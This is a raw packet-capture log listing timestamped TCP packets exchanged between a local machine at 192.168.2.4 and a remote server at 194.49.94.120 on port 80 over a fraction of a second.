Nov 18, 2023 10:02:36.545159101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545183897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545206070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545238018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545254946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545293093 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545306921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545326948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545344114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545368910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545384884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545387030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545406103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545434952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545437098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545453072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545468092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545469046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545485973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545502901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545509100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545519114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545536995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545547009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545555115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.545567036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.545609951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546199083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546216965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546266079 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546267986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546283960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546299934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546317101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546334028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546336889 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546350956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546367884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546370029 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546386003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546401024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546417952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546420097 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546435118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546451092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546458960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546467066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546475887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546484947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546503067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546518087 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546520948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546538115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546554089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546555042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546570063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546571016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546586990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546603918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546608925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546644926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546802044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546818972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546833992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546850920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546868086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546868086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546884060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546885967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546901941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546915054 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546920061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546936035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546952963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546957016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.546969891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.546987057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547002077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547003031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547020912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547030926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547036886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547055006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547070026 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547071934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547087908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547103882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547106981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547121048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547127008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547137976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547153950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547169924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547178030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547193050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547209024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547214985 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547225952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547235966 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547243118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547259092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547259092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547276974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547293901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547295094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547310114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547327042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547327042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547343016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547359943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547377110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547378063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547394991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547410965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547413111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547427893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547429085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547444105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547461033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547477961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547516108 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547549963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547566891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547584057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547599077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547600985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547616959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547632933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547633886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547650099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547667027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547669888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547683001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547699928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547710896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547717094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547734022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547750950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547750950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547770977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547786951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547791958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547804117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547808886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547821999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547837973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547857046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547868967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547873020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547893047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547909975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547914982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547929049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547939062 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.547946930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547966957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547983885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.547986031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548001051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548017979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548021078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548036098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548053026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548055887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548069954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548086882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548099995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548104048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548118114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548121929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548140049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548157930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548157930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548176050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548194885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548202991 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548212051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548223019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548228979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548247099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548264027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548266888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548279047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548295975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548315048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548320055 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548332930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548350096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548367023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548371077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548371077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548382998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548398018 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548398972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548417091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548432112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548448086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548448086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548465014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548465967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548484087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548499107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548500061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548516989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548533916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548542023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548552036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548558950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548568010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548584938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548599958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548602104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548618078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548634052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548649073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548651934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548669100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548686028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548702002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548702002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548718929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548719883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548734903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548743963 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548751116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548768044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548784018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548787117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548800945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548810005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548818111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548827887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548835039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548851013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548868895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548883915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548885107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548902035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548917055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548918962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548934937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548935890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.548953056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.548985004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549000978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549017906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549020052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549034119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549052000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549067020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549067974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549087048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549103022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549118042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549120903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549137115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549153090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549159050 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549168110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549177885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549185038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549201965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549213886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549217939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549235106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549253941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549258947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549273014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549278021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549294949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549309969 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549312115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549329042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549345016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549349070 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549362898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549380064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549392939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549396992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549413919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549427986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549432039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549448967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549463034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549467087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549484015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549494028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549499989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549516916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549532890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549534082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549550056 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549550056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549566984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549582958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549595118 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549599886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549618006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549629927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549634933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549652100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549652100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549669027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549685001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549690962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549701929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549717903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549726009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549734116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549750090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549767017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549770117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549782991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549798965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549809933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549815893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549827099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549834013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549849987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549849987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549866915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549882889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549892902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549900055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549916983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549927950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549932957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549949884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549967051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.549968004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.549983978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550000906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550000906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550017118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550018072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550034046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550050974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550057888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550067902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550086021 CET	80	49744	194.49.94.120	192.168.2.4
